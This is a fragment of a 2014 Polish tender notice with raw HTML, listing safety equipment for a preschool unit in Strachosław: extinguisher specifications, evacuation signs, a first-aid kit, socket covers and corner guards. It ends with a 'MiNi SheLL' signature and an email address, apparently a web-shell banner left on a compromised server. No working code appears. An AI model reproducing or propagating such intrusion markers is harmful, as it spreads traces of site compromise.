Rodzaj środka gaśniczego proszek gaśniczy Furex ABC Standard
Czynnik napędowy N2
Ciśnienie robocze 15 bar
Zakres temperatur stosowania -30°C +60°C
Czas działania15 s
Wymiary200x560 [mm]
Maks. napięcie gaszonego urządzenia 245 kV 	1
2	Oznaczenie ewakuacyjne. Znaki ewakuacyjne wykonane zgodnie z PN-92/N-01256/0; PN-92/N-01256/01; DIN 67 510; ISO / FDIS 17398.
Droga ewakuacyjna x2, Wyjście awaryjne x1, Kierunek do wyjścia drogi ewakuacyjnej dla niepełnosprawnych w prawo x1, Kierunek do wyjścia drogi ewakuacyjnej dla niepełnosprawnych w lewo x1, Kierunek do wyjścia drogi ewakuacyjnej w dół, Kierunek do wyjścia drogi ewakuacyjnej x2,  Klucz do wyjścia ewakuacyjnego znajduje się w sekretariacie x1,  Pierwsza pomoc x1.	9
3	Apteczka z kompletnym wyposażeniem. Metalowa, naścienna, zamykana na klucz. Wyposażenie zgodne z normami Unii Europejskiej. Wymiary 33x25x11cm, skład DIN 13164 plus 	1
4	Zaślepki gniazd elektrycznych	8
5	Piankowa nakładka na narożnik meblowy	13
6	Instrukcja udzielania pierwszej pomocy.
Format: 24,5x35cm
Podłoże: Płyta pcv 0,5mm	1
7	Osłonki na grzejniki wysokość 100 cm. Szerokość 100 cm	2
2) Wspólny Słownik Zamówień (CPV): 35111320-4

3) Czas trwania lub termin wykonania: Zakończenie: 27.06.2014r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.13.20-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część Nr 6 zamówienia  - Zakup sprzętu BHP do Oddziału Przedszkolnego w Szkole Podstawowej w  Strachosławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krótki opis ze wskazaniem wielkości lub zakresu zamówienia  
Lp.	Nazwa i opis produktu	Ilość sztuk/zestawów
1	Gaśnica przeciwpożarowa proszkowa GP9xABC/E, 9kg środka gaśniczego, przeznaczona do gaszenia pożarów A, B, C, E. Dane techniczne:
Masa środka gaśniczego9 kg
Masa całkowita ok. 15 kg
Rodzaj środka gaśniczego proszek gaśniczy Furex ABC Standard
Czynnik napędowy N2
Ciśnienie robocze 15 bar
Zakres temperatur stosowania -30°C +60°C
Czas działania15 s
Wymiary200x560 [mm]
Maks. napięcie gaszonego urządzenia 245 kV 	1
2	Oznaczenie ewakuacyjne. Znaki ewakuacyjne wykonane zgodnie z PN-92/N-01256/0; PN-92/N-01256/01; DIN 67 510; ISO / FDIS 17398.
Droga ewakuacyjna x3, Wyjście awaryjne x1, Kierunek do wyjścia drogi ewakuacyjnej dla niepełnosprawnych w prawo x1, Kierunek do wyjścia drogi ewakuacyjnej dla niepełnosprawnych w lewo x1, Kierunek do wyjścia drogi ewakuacyjnej w dół, Kierunek do wyjścia drogi ewakuacyjnej x2,  Klucz do wyjścia ewakuacyjnego znajduje się w sekretariacie x1,  Pierwsza pomoc x1.
	10
3	Apteczka z kompletnym wyposażeniem. Metalowa, naścienna, zamykana na klucz. Wyposażenie zgodne z normami Unii Europejskiej. Wymiary 33x25x11cm, skład DIN 13164 plus 	1
4	Zaślepki gniazd elektrycznych	8
5	Piankowa nakładka na narożnik meblowy	23
6	Instrukcja udzielania pierwszej pomocy.
Format: 24,5x35cm
Podłoże: Płyta pcv 0,5mm	1
2) Wspólny Słownik Zamówień (CPV): 35111320-4
3) Czas trwania lub termin wykonania: Zakończenie: 27.06.2014r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.13.20-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com